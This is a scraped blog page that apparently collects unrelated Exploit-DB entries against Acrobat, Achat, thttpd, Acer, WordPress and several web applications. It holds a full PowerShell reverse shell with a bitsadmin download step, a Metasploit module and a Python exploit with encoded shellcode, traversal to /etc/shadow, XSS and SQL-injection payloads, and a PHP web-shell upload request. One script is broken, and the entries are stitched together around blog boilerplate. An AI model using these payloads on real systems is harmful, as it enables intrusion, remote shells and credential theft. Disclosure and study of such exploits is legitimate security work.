#####################################################################################
Application: Acrobat Reader DC
Platforms: Windows
Versions: 15.008.20082.15957
CVE: CVE-2015-7622
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).[14]
The family comprises Acrobat Reader (formerly Adobe Reader), Acrobat (formerly Acrobat Exchange) and Acrobat.com. Thefreeware Acrobat Reader, available for several desktop and mobile platforms, can view, print and annotate PDF files.[15] Thecommercial proprietary Acrobat, available for Microsoft Windows and OS X only, can also create, edit, convert, digitally sign, encrypt, export and publish PDF files. Acrobat.com complements the family with a variety of enterprise content managementand file hosting services.
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
============================
2) Report Timeline
============================
2015-08-09: Francis Provencher of COSIG found the issue;
2015-08-11: Francis Provencher of COSIG report vulnerability to PSIRT;
2015-10-13: Adobe release a patch (APSB15-24)
#####################################################################################
============================
3) Technical details
============================
An error in the the PDF parser, could lead to a memory corruption when processing a crafted PDF with an invalid image.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2015-001.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38787.zip
###############################################################################
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
86399649
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC
Vendor: Acoustica, Inc.
Product web page: http://www.acoustica.com
Affected version: 1.0 Build 12
Summary: Pianissimo virtual piano uses a combination of sample
playback and advanced physical modeling to create a stunning
acoustic grand piano sound. Starting with 250 MB of high quality
samples of a Steinway™ Model D grand piano, Pianissimo uses
complex signal processing and programming to recreate the warmth,
response, and playability of a real grand piano.
Desc: The vulnerability is caused due to a boundary error in the
processing of a user input in the registration id field of the
registration procedure, which can be exploited to cause a buffer
overflow when a user inserts long array of string for the ID.
Successful exploitation could allow execution of arbitrary code
on the affected machine.
-----------------------------------------------------------------
(b98.1790): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\VST\Pianissimo\Pianissimo.dll -
eax=00000000 ebx=532d0245 ecx=bdeec3ea edx=00000049 esi=4a18d43c edi=06c07739
eip=061fbda7 esp=00184a28 ebp=4d2d0276 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
Pianissimo!CRefObj::SeekToData+0x4127:
061fbda7 8b86dc200000 mov eax,dword ptr [esi+20DCh] ds:002b:4a18f518=????????
0:000> d esp-1000
00183a28 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a38 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a48 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a58 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a68 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a78 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a88 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00183a98 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0:000> u 061fbda7
Pianissimo!CRefObj::SeekToData+0x4127:
061fbda7 8b86dc200000 mov eax,dword ptr [esi+20DCh]
061fbdad 50 push eax
061fbdae 6a30 push 30h
061fbdb0 681cc52c06 push offset Pianissimo!CRefObj::Tell+0x45bfc (062cc51c)
061fbdb5 6810c52c06 push offset Pianissimo!CRefObj::Tell+0x45bf0 (062cc510)
061fbdba e841f8ffff call Pianissimo!CRefObj::SeekToData+0x3980 (061fb600)
061fbdbf 83c410 add esp,10h
061fbdc2 8ac3 mov al,bl
-----------------------------------------------------------------
Tested on: Microsoft Windows 7 Professional SP1 (EN) 32/64bit
Microsoft Windows 7 Ultimate SP1 (EN) 32/64bit
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5243
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5243.php
16.03.2015
--
900 bytes:
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
11111-11111-11111-11111
#!/bin/sh
#
# Acoem 01dB CUBE Smart Noise Monitoring Terminal
# Remote Password Change
#
# HW version: LIS001A
# Application FW: 2.34
# Metrology FW: 2.10
# Modem FW: 12.00.005 / 08.01.108
#
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
[todor@adamantium ~]$ GET "http://<TARGET>/ajax/F_validPassword.asp?NewPwd=<PASSWORD>"
source: https://www.securityfocus.com/bid/60010/info
thttpd is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the web server. Information harvested may aid in launching further attacks.
www.example.com/../../../../../../../../etc/passwd
www.example.com/../../../../../../../../etc/shadow
# Exploit Title: Arbitrary Code Execution
# Google Dork: N/A
# Date: 03-07-2018
# Exploit Author: Clutchisback1
# Vendor Homepage: https://www.acl.com
# Software Link: https://www.acl.com/products/acl-analytics/
# Version: 11.x - 13.0.0.579
# Tested on: Windows 7 pro SP1 x86
#########################################################################
#
#
# Clutchisback1 /\/\/\ I'll get OSCP one day! /\/\/\
# Welcome to A_C_SHELLLLLL!!
# All Glory to Yeshua
# Shoutouts to my Menotor: Ch33z_plz for teaching me everyday
# and my Offsec Mentor: T0w3ntum introducing me to netsec!
# (I have consent for those mentions :D)
#
#
#########################################################################
EXECUTE 'bitsadmin /transfer myDownloadJob /download /priority high http://127.0.0.1/shell.ps1 c:\temp\shell.ps1'
EXECUTE "powershell C:\temp\shell.ps1"
Description/Usage:
Please use the script below to create a reverse shell payload that will be downloaded form your attacking machine and uploaded to the target host by bitsadmin and placed in the target c:\temp directory and saved as shell.ps1.
The second `Execute` command will execute the stored payload
Powershell Reverse Shell was downloaded from here: https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 443);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
$res = ""
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 1024)
}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
if(!$out.equals("exit")){
$args = "";
if($out.IndexOf(' ') -gt -1){
$args = $out.substring($out.IndexOf(' ')+1);
$out = $out.substring(0,$out.IndexOf(' '));
if($args.split(' ').length -gt 1){
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = "cmd.exe"
$pinfo.RedirectStandardError = $true
$pinfo.RedirectStandardOutput = $true
$pinfo.UseShellExecute = $false
$pinfo.Arguments = "/c $out $args"
$p = New-Object System.Diagnostics.Process
$p.StartInfo = $pinfo
$p.Start() | Out-Null
$p.WaitForExit()
$stdout = $p.StandardOutput.ReadToEnd()
$stderr = $p.StandardError.ReadToEnd()
if ($p.ExitCode -ne 0) {
$res = $stderr
} else {
$res = $stdout
}
}
else{
$res = (&"$out" "$args") | out-string;
}
}
else{
$res = (&"$out") | out-string;
}
if($res -ne $null){
$writer.WriteLine($res)
}
}
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
END
source: https://www.securityfocus.com/bid/51608/info
Acidcat ASP CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Acidcat ASP CMS 3.5.1 and 3.5.2 are vulnerable; other versions may also be affected.
http://www.example.com/admin/admin_colors.asp?"><script>alert('XSS')</script>
http://www.example.com/admin/admin_config.asp?"><script>alert('XSS')</script>
http://www.example.com/admin/admin_cat_add.asp?"><script>alert('XSS')</script>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Achat v0.150 beta7 Buffer Overflow',
'Description' => %q{
This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By
sending a crafted message to the default port 9256 it's possible to overwrites the
SEH handler. Even when the exploit is reliable it depends of timing since there are
two threads overflowing the stack in the same time. This module has been tested on
Windows XP SP3 and Windows 7.
},
'Author' =>
[
'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery
'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CWE', '121'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Payload' =>
{
'DisableNops' => true,
'Space' => 730,
'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed,
'EncoderOptions' =>
{
'BufferRegister' => 'EAX'
}
},
'Platform' => 'win',
'Targets' =>
[
# Tested OK Windows XP SP3, Windows 7
# Not working on Windows Server 2003
[ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe
],
'Privileged' => false,
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 18 2014'))
register_options(
[
Opt::RPORT(9256)
], self.class)
end
def exploit
connect_udp
# 0055 00 ADD BYTE PTR SS:[EBP],DL # padding
# 2A00 SUB AL,BYTE PTR DS:[EAX] # padding
# 55 PUSH EBP # ebp holds a close pointer to the payload
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 58 POP EAX # mov eax, ebp
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 05 00140011 ADD EAX,11001400 # adjusting eax
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 2D 00130011 SUB EAX,11001300 # lea eax, eax+100
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 50 PUSH EAX # eax points to the start of the shellcode
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 58 POP EAX # padding
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
# 59 POP ECX # padding
# 0039 ADD BYTE PTR DS:[ECX],BH # padding
first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset
sploit << "\x61\x40" # POPAD + INC EAX
sploit << target.ret # AChat.exe p/p/r address
# adjusting the first thread's unicode payload, tricky asm-fu
# the first seh exception jumps here, first_stage variable will be executed
# by the second seh exception as well. It needs to be in sync with the second
# thread, so that is why we adjust eax/ebp to have a close pointer to the
# payload, then first_stage variable will take the rest of the job.
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
# 55 PUSH EBP # ebp with close pointer to payload
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 58 POP EAX # put ebp to eax
# 006E 00 ADD BYTE PTR DS:[ESI],CH # padding
# 2A00 SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place
# 2A00 SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more
# 05 00140011 ADD EAX,11001400 # more adjusting
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
# 2D 00130011 SUB EAX,11001300 # lea eax, eax+100
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
# 50 PUSH EAX # saving eax
# 0043 00 ADD BYTE PTR DS:[EBX],AL # padding
# 5D POP EBP # mov ebp, eax
sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX
sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload
sploit << "\x00" + 'A' * 10 + "\x00"
i = 0
while i < sploit.length do
if i > 172000
Rex::sleep(1.0)
end
sent = udp_sock.put(sploit[i..i + 8192 - 1])
i += sent
end
disconnect_udp
end
end
#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit
import socket
import sys, time
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
buf += "\x65\x6d\x30\x41\x41"
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.91.130', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!"
i=0
while i<len(p):
if i > 172000:
time.sleep(1.0)
sent = sock.sendto(p[i:(i+8192)], server_address)
i += sent
sock.close()
# Exploit Title: Acer Updater Service 1.2.3500.0 - 'UpdaterService.exe' Unquoted Service Path
# Discovery by: Emmanuel Lujan
# Discovery Date: 2020-11-26
# Vendor Homepage: https://www.acer.com/ac/en/US/content/home
# Tested Version: 1.2.3500.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Home Premium x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Live Updater Service Live Upd
ater Service C:\Program Files\Acer\Acer Updater\Updater
Service.exe Auto
# Service info:
C:\>sc qc "Live Updater Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Live updater Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Acer\Acer Updater\UpdaterService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Live Updater Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other
security applications where it could potentially be executed during application startup or reboot. If successful, the local user's
code would execute with the elevated privileges of the application.
# Exploit Title: Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)
# Discovered by: Yehia Elghaly
# Discovered Date: 22/12/2021
# Vendor Homepage: https://www.accu-time.com/
# Software Link : https://www.accu-time.com/maximus-employee-time-clock-3/
# Tested Version: 1.0
# Vulnerability Type: Buffer Overflow (DoS) Remote
# Tested on OS: linux
# Description: Accu-Time Systems MAXIMUS 1.0 Telnet Remote Buffer Overflow
# Steps to reproduce:
# 1. - Accu-Time Systems MAXIMUS 1.0 Telnet listening on port 23
# 2. - Run the Script from remote PC/IP
# 3. - Telnet Crashed
#!/usr/bin/env python3
import socket
import sys
print("#######################################################")
print("# Accu-Time Systems MAXIMUS Remote (BUffer Overflow) #")
print("# -------------------------- #")
print("# BY Yehia Elghaly #")
print("#######################################################")
if (len(sys.argv)<2):
print ("Usage: %s <Target Host> ") % sys.argv[0]
print ("Example: %s 192.168.113.1 ") % sys.argv[0]
exit(0)
print ("\nSending Evil.......Buffer...")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((sys.argv[1], 23))
buffer = "A"*9400
s.send(" Crashed Check the connection")
Print ("Crashed")
except:
print ("Could not connect to ACCU Time Telnet!")
# Exploit Title: Express Accounts Accounting 7.02 - Persistent Cross-Site Scripting
# Exploit Author: Debashis Pal
# Date: 2019-10-16
# Vendor Homepage: https://www.nchsoftware.com
# Source: https://www.nchsoftware.com/accounting/index.html
# Version: Express Accounts Accounting v7.02
# CVE : N/A
# Tested on: Windows 7 SP1(32bit)
# About Express Accounts Accounting v7.02
=========================================
Express Accounts is professional business accounting software, perfect for small businesses.
# Vulnerability
================
Persistent Cross site scripting (XSS).
# PoC
======
1. Login as authenticated unprivileged user to Express Accounts Accounting v7.02 web enable service i.e http://A.B.C.D:98 [Default installation].
2. Under "Invoices" , Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put </script><script>alert('XSS');</script>
Save the change.
or
Under "Sales Orders"
Sales Orders -> view Orders -> Add New Order -> New Sales Order ->Customer: Field put </script><script>alert('XSS');</script>
Save the change.
or
Under "Items"
Items -> Add new item-> Item field: put </script><script>alert('XSS');</script>
Save the change.
or
Under "Customers"
Customers -> Add New Customer -> Customer Name: put </script><script>alert('XSS');</script>
Save the change.
or
Under "Quotes"
Quotes -> View Quotes -> Add New Quote -> Customer: put </script><script>alert('XSS');</script>
Save the change.
3. Login in authenticated privileged or unprivileged user to Express Accounts v7.02 web enable service and visit any of Invoices/Sales Orders/Items/Customers/Quotes section, Persistent XSS payload will execute.
# Disclosure Timeline
======================
Vulnerability Discover Date: 15-Sep-2019.
Vulnerability notification to vendor via vendor provided web form: 15-Sep-2019, 19-Sep-2019, 26-Sep-2019, no responds.
Submit exploit-db : 16-Oct-2019.
# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
# Exploit Title: Accounting Journal Management System 1.0 - 'id' SQLi (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://www.sourcecodester.com/php/15155/accounting-journal-management-system-trial-balance-php-free-source-code.html
# Version : 1.0
# Tested on: windows 10 xammp | Kali linux
# Category: WebApp
# Google Dork: N/A
# Date: 09.02.2022
######## Description ########
#
#
# Authenticate and get update user settings will be appear the
# id paramater put your payload at there it'll be work
#
#
#
######## Proof of Concept ########
========>>> REQUEST <<<=========
GET /ajms/admin/?page=user/manage_user&id=5%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=r513r6hug9aqofhlfs3bc7f7qa
Upgrade-Insecure-Requests: 1
# Exploit Title: Unauthenticated Arbitrary File Upload
# Date: November 12, 2017
# Exploit Author: Colette Chamberland
# Author contact: colette@defiant.com
# Author homepage: https://defiant.com
# Vendor Homepage: https://accesspressthemes.com/
# Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446
# Version: < 3.2.0
# Tested on: Wordpress 4.x
# CVE : CVE-2017-16949
Description:
Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows
the attacker to upload anything they want, bypassing the filters.
PoC:
POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1
Host:server
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792
Content-Length: 264
Referer: http://target.com/
Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6;
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------7230359611602921801124357792
Content-Disposition: form-data; name="qqfile"; filename="myshell.php"
Content-Type: text/php
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
-----------------------------7230359611602921801124357792--
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ACCESSDIVER-BUFFER-OVERFLOW.txt
Vendor:
==============
M. Jean Fages
www.accessdiver.com
circa 1998-2006
Product:
=============================
AccessDiver V4.301 build 5888
AccessDiver is a security tester for Web pages. It has got a set of tools
which
will verify the robustness of you accounts and directories. You will know
if your
customers, your users and you can use safely your web site.
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
AccessDiver is vulnerable to multiple buffer overflows, two vectors are
described below.
1) buffer overflow @ 2073 bytes in URL field for Server / IP address and
will overwrite NSEH and SEH exception handlers.
EAX 00000000
ECX 52525252
EDX 7C9037D8 ntdll.7C9037D8
EBX 00000000
ESP 0012EA08
EBP 0012EA28
ESI 00000000
EDI 00000000
EIP 52525252 <----------------- BOOM
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
